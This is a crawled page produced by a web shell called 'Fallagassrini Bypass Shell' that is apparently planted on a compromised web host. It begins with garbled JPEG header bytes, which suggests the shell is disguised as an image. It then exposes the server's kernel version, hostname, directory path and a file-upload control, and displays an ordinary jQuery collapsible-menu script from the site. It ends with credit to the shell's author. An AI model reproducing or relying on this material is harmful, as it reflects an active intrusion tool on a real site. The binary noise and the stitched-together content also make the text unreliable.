JFIF;CREATOR: gd-jpeg v1.0 (using IJG JPEG v80), quality = 85 C  !"$"$C$^" }!1AQa"q2#BR$3br %&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz w!1AQaq"2B #3Rbr $4%&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz ? C^",k8`98?þ. s$ֱ$Xw_Z¿2b978%Q}s\ŴqXxzK1\@N2<JY{lF/Z=N[xrB}FJۨ<yǽw 5o۹^s(!fF*zn5`Z}Ҋ">Ir{_+<$$C_UC)^r25d:(c⣕U .fpSnFe\Ӱ.չ8# m=8iO^)R=^*_:M3x8k>(yDNYҵ/v-]WZ}h[*'ym&e`Xg>%̲yk߆՞Kwwrd󞼎 r;M<[AC¤ozʪ+h%BJcd`*ǎVz%6}G;mcՊ~b_aaiiE4jPLU<Ɗvg?q~!vc DpA/m|=-nux^Hޔ|mt&^ 唉KH?񯣾 ^]G\4#r qRRGV!i~眦]Ay6O#gm&;UV BH ~Y8( J4{U| 14%v0?6#{t񦊊#+{E8v??c9R]^Q,h#i[Y'Š+xY佑VR{ec1%|]p=Vԡʺ9rOZY L(^*;O'ƑYxQdݵq~5_uk{yH$HZ(3 )~G Fallagassrini

Fallagassrini Bypass Shell

echo"
Fallagassrini
";
Current Path : /home/jpewexports/www/html/js/

Linux 43-225-53-84.webhostbox.net 3.10.0-1160.92.1.el7.x86_64 #1 SMP Tue Jun 20 11:48:01 UTC 2023 x86_64
Upload File :
Current File : /home/jpewexports/www/html/js/developr.collapsible.js

;(function($, window, document)
{
	/*
	 * window and document are passed through as local variables rather than as globals, because this (slightly)
	 * quickens the resolution process and can be more efficiently minified.
	 */

		// Objects cache
	var doc = $(document),

		// Global animation switch
		animate = true;

	// Navigable menus
	doc.on('click', '.collapsible li, .collapsible li > span, .collapsible li > a', function(event)
	{
		// Only work if the element is the event's target
		if (event.target !== this)
		{
			return;
		}

			// Clicked element
		var clicked = $(this),

			// LI element
			li = $(this).closest('li'),

			// Sub-menu
			submenu = li.children('ul:first'),

			// Root menu
			root = li.closest('.collapsible'),

			// Other vars
			load, current, url, height;

		// If there is a submenu
		if (submenu.length > 0)
		{
			// If already open
			if (li.hasClass('collapsible-open'))
			{
				// Close
				li.removeClass('collapsible-open');
				if (animate)
				{
					submenu.stop(true).css('overflow', 'hidden').animate({

						height: '0px'

					}, function()
					{
						submenu.css({
							overflow: '',
							height: ''
						}).hide();
					});
				}
				else
				{
					submenu.stop(true).hide();
				}

				// Arrow
				if (li.hasClass('with-left-arrow') || li.hasClass('with-right-arrow'))
				{
					li.removeClass('arrow-up').addClass('arrow-down');
				}

				// Close event
				li.trigger('collapsible-close');
			}
			else
			{
				// Open parents if required
				$(li.parentsUntil('.collapsible', 'li').not('.collapsible-open').get().reverse()).click();

				// If only one menu should be open on each level
				if (root.hasClass('as-accordion'))
				{
					li.siblings('.collapsible-open').click();
				}

				// Mark as open
				li.addClass('collapsible-open');
				if (animate)
				{
					// Get final size
					height = submenu.stop(true).css({

						display: 'block',
						height: ''

					}).height();

					// Animate
					submenu.css({

						overflow: 'hidden',
						height: '0px'

					}).animate({

						height: height+'px'

					}, function()
					{
						submenu.css({
							overflow: '',
							height: ''
						});
					});
				}
				else
				{
					submenu.stop(true).css({
						overflow: '',
						height: ''
					}).show();
				}

				// Arrow
				if (li.hasClass('with-left-arrow') || li.hasClass('with-right-arrow'))
				{
					li.removeClass('arrow-down').addClass('arrow-up');
				}

				// Open event
				li.trigger('collapsible-open');
			}

			// Prevent default behavior
			event.preventDefault();
		}
		else if (clicked.hasClass('collapsible-ajax'))
		{
			// If already loading, do nothing
			if (li.children('.load').length)
			{
				return;
			}

			// Get target url
			url = clicked.is('a') ? clicked.attr('href') : clicked.data('collapsible-url');

			// If valid
			if (url && typeof url === 'string' && $.trim(url).length > 0 && url.substr(0, 1) !== '#')
			{
				// Load indicator
				load = $('<div class="load"></div>').appendTo(li);

				// Show load
				if (animate)
				{
					height = load.height();
					load.css({

						overflow: 'hidden',
						height: '0px'

					}).animate({

						height: height+'px'

					}, function()
					{
						submenu.css({
							overflow: '',
							height: ''
						});
					});
				}

				// Load submenu
				$.ajax(url, {
					error: function(jqXHR, textStatus, errorThrown)
					{
						// If notification system is enabled
						if (window.notify)
						{
							window.notify('Menu loading failed with the status "'+textStatus+'"');
						}

						// Remove load
						if (animate)
						{
							load.stop(true).css({

								overflow: 'hidden'

							}).animate({

								height: '0px'

							}, function()
							{
								load.remove();
							});
						}
						else
						{
							load.remove();
						}
					},
					success: function(data, textStatus, jqXHR)
					{
						// Remove ajax marker, mark as loaded
						clicked.removeClass('collapsible-ajax').addClass('collapsible-ajax-loaded');

						// Append data
						li.append(data);

						// Finally open the clicked element
						clicked.click();

						// Remove load
						if (animate)
						{
							load.stop(true).css({

								overflow: 'hidden'

							}).animate({

								height: '0px'

							}, function()
							{
								load.remove();
							});
						}
						else
						{
							load.remove();
						}
					}
				});

				// Prevent default behavior
				event.preventDefault();
			}
		}
		else if (clicked.hasClass('collapsible-ajax-loaded'))
		{
			// Probably an ajax menu who loaded nothing, prevent default behavior
			event.preventDefault();
		}
	});

	// Add to template setup function
	$.template.addSetupFunction(function(self, children)
	{
		// Style arrows
		this.findIn(self, children, '.collapsible li').addClass('arrow-down');

		// Current open menu element
		this.findIn(self, children, '.collapsible-current').each(function(i)
		{
			var closest = $(this).closest('ul').closest('li, .collapsible'),
				child;

			// Check if in a submenu
			if (closest.length > 0 && !closest.hasClass('collapsible'))
			{
				// Disable animation
				animate = false;

				// Is there a span or a link?
				child = closest.children('a, span').first();
				if (child.length > 0)
				{
					child.click();
				}
				else
				{
					closest.click();
				}

				// Enable animation
				animate = true;
			}
		})

		return this;
	});

})(jQuery, window, document);

bypass 1.0, Devloped By El Moujahidin (the source has been moved and devloped)
Email: contact@elmoujehidin.net